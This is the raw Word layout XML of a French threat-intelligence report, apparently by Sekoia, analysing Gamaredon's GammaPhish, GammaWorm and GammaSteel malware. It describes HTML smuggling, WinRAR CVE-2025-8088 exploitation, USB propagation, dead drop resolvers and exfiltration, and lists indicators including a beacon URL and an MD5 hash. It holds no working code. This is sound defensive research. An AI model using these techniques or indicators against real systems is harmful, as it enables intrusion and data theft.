            <wp:wrapNone/>
            <wp:docPr id="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13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Qu’est ce qu’un </w:t>
                        </w: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Dead Drop Resolver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4881903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Les attaquants peuvent utiliser un service Web externe légitime existant pour héberger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5055258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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informations renvoyant vers une infrastructure de commande et de contrôle. Ils peuvent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5228613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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publier du contenu, appelé </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dead drop resolver,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sur des services Web comportant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5401968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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domaines ou des adresses IP intégrés (et souvent dissimulés ou encodés). Une fois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5575323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5476034" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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603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infectées, les victimes se connecteront à ces résolveurs et seront redirigées par ceux-ci.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5850278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Les sites Web populaires et les réseaux sociaux servant de mécanisme de C2 peuvent offrir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6023633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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couverture importante, car il est probable que les hôtes d’un réseau communiquent déjà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6196988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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avec eux avant d’être compromis. L’utilisation de services courants, tels que ceux proposés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6370343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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par Google ou Twitter, permet aux attaquants de se dissimuler plus facilement dans le bruit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6543698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1084005" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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40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fond attendu.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6800247</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3423558" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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558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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.3Propagation : GammaWorm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7204098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Pour ce qui est de la propagation, l’analyse forensique a révélé un ver VBScript hautement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7377453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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obfusqué, nommé GammaWorm. Ce dernier assure sa persistance via des tâches planifiées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7550808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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et dissimule ses modules principaux dans les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Alternate Data Streams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(ADS) du système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7724163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fichiers NTFS. Le module de propagation cible spécifiquement les clés USB et les lecteurs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7897518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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réseau, en masquant les répertoires légitimes et en les remplaçant par des raccourcis LNK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8070873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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malveillants. Il génère également un second type de raccourcis LNK utilisant des techniques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8244228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’ingénierie sociale en ukrainien. Le ver maintient une configuration réseau dynamique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8417583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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extrayant les DDR et en stockant l’infrastructure C2 active dans le registre Windows. Enfin, il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8590938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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entre dans une boucle d’exécution infinie, agissant comme une porte dérobée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8764293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5010693" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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06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interroger sa configuration réseau et exécuter du code arbitraire fourni par le C2.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968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4201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942372</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3182996" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2996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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.4Exfiltration : GammaSteel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1346223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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La phase d’exfiltration, assurée par GammaSteel, est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 modulaire écrit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1519578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Powershell. Ce dernier s’installe entièrement dans le registre Windows, y écrivant 71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1692933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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modules distincts, chacun chiffré individuellement à l’aide de l’API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Windows Data Protection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1866288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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(DPAPI). GammaSteel gère trois mécanismes simultanés d’acquisition de données :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2039643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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analyses récurrentes des disques locaux et réseau, la surveillance des événements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2212998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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matériels pour détecter les nouvelles clés USB insérées et une surveillance en temps réel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2386353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ciblés dès qu’ils sont enregistrés ou modifiés. Les fichiers ciblés sont exfiltrés vers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2559708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fournisseur de stockage cloud compatible S3. En cas de défaillance de l’infrastructure cloud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2733063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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principale, GammaSteel bascule vers des serveurs C2 contrôlés par les opérateurs,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2906418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5322084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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servent également de porte dérobée active pour l’exécution de code distant arbitraire.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3162967</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2180302" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0302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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.5Autres </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle29"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">payloads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3566818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Bien que cette chaîne d’infection reconstituée comprenne des dizaines de fichiers et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3740173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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scripts individuels, il est fort probable que d’autres logiciels malveillants, comme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3913528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaWipe, puissent être déployés en fonction des objectifs des opérateurs. Sur le plan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4086883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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technique, l’enquête menée par Sekoia confirme que GammaLoad est directement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4260238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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responsable du déploiement de la charge utile GammaSteel. Cependant, le vecteur exact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4433593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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déploiement de GammaWorm reste incertain : il pourrait être déposé simultanément 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4606948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaLoad ou introduit indépendamment via l’exécution d’une clé USB malveillante par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4780303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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utilisateur. Par ailleurs, l’analyse globale du flux d’exécution permet d’affirmer avec une forte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4953658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5166878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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68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confiance que GammaPhish est conçu pour déployer GammaLoad en premier lieu.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6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7273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" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1182370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2973067</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5196840" cy="6129667"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="31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-12" r="0" t="-20" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5196840" cy="61296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6840" h="6129667">
                          <a:moveTo>
                            <a:pt x="0" y="6129667"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5196840" y="6129667"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5196839" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="612966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930946</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2775153" cy="321282"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5153" cy="32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50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</w:rPr>
                          <w:t xml:space="preserve">4 Analyse technique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1390682</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2878909" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8909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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.1GammaPhish : </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle29"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">staging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1794533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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L'équipe TDR de Sekoia n'a pas pu identifier le vecteur diffusion initial précédant le fichier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1967888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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xHTML. D'après le rapport d'ESET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20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, ils estiment que ce fichier est probablement diffusé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2141243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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sous forme de pièce jointe à un e-mail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spearphishing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ou qu'il est contenu dans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2314598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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archive jointe à un tel e-mail. L'analyse suivante est basée sur un échantillon nommé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2485020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1_13_5_1691_09.12.2025.xhtml</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle31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"/>
                          </w:rPr>
                          <w:t xml:space="preserve">(MD5 : </w:t>
                        </w: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1794369214b7f62e70a0485e61335c61</w:t>
                        </w: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).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2667658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5137820" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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78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chaîne d'infection à partir du fichier xHTML est illustrée dans le graphique suivant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024" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2411095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9079250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2775902" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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590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 – Chaîne d'infection partant du fichier xHTML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5480976" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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097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20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https://www.welivesecurity.com/en/eset-research/gamaredon-2024-cranking-out-spearphishing-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2039276" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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927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campaigns-ukraine-evolved-toolset/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" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3749675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="99568" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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56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1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9833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5165734</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="2138680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2138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2138680">
                          <a:moveTo>
                            <a:pt x="0" y="1343660"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1343660"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="506730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="506730"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="506730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506730"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="506730"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1343660"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138680"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1343660"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="506730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="506730"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1343660"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="506730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506730"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="50673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50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552" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2591435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1167139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0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1167139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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744" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4340225</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3764289</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1248413" cy="588010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8413" cy="58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8410" h="588010">
                          <a:moveTo>
                            <a:pt x="1248410" y="388619"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1248410" y="588010"/>
                          </a:lnTo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608330" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60833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792" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2381884</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4152909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2859405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6137919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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888" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1514474</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6137919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9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2357117</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="970927"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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-11" r="-11" t="-64" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="9709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970927">
                          <a:moveTo>
                            <a:pt x="0" y="970927"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="97092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97092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" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1437640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7697467</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4686300" cy="1430020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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 l="-13" r="0" t="-43" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686300" cy="1430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86300" h="1430020">
                          <a:moveTo>
                            <a:pt x="4686300" y="1430020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4686299" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1430020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4686299" y="143002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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Tout d'abord, pour attire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r l'utilisateur, la page affiche un simple message indiquant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1152748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">DOCUMENT DOWNLOADED</w:t>
                        </w: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. Mais parallèlement, elle déclenche un mécanisme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1349398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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signalement. À</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> son</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> ouverture, elle envoie une requête</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> à l'adresse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1516645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5403107" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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310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http://iiwdsxwamylbwwsoyrmj.supabase.co/functions/v1/clever-responder/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1696350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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KokonGoogle_09.12.2025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pour charger une image de 1x1 pixel. Cette technique, qui sert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1878988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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confirmer à l’opérateur que la victime a ouvert le document leurre, est utilisée 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2052343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2217392" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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73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Gamaredon depuis au moins 2018.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176" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2098039</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3304560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3402355" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2355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3 – Affichage du site web téléchargeant l’archive vulnérable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3557293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Ensuite, le code déclenche une erreur de charge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ment pou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r une ressource externe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3749263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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inexistante, ce qui active un événement JavaScript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OnError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contenant la charge utile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3945913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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malveillante. Ce code n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e s’exécute que si l’agent utilisateur correspond à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des identifiants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4137883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834263" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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26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Windows spécifiques : </w:t>
                        </w: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[“Win32”, “Win64”, “Windows”, “WinCE”]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. Il lance ensuite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4334533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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une technique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HTML Smuggling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à l’aide d’une archive RAR encodée en Base64 intégrée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4504955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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à son code source, nommée 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2_14_6_1033_09.12.2025.rar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et exploitant la vulnérabilité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4687593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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CVE-2025-8088. Pour que la chaîne d’exécution se poursuive, l’utilisateur doit ouvrir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4860948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2604640" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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46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manuellement l’archive RAR téléchargée.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5135903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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L'archive utilisée par Gamaredon exploite la vulnérabilité CVE-2025-8088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une faille critique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5309258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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de type </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">path traversal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affectant les versions de WinRAR antérieures à la version 7.13,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5482613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1448762" cy="160641"/>
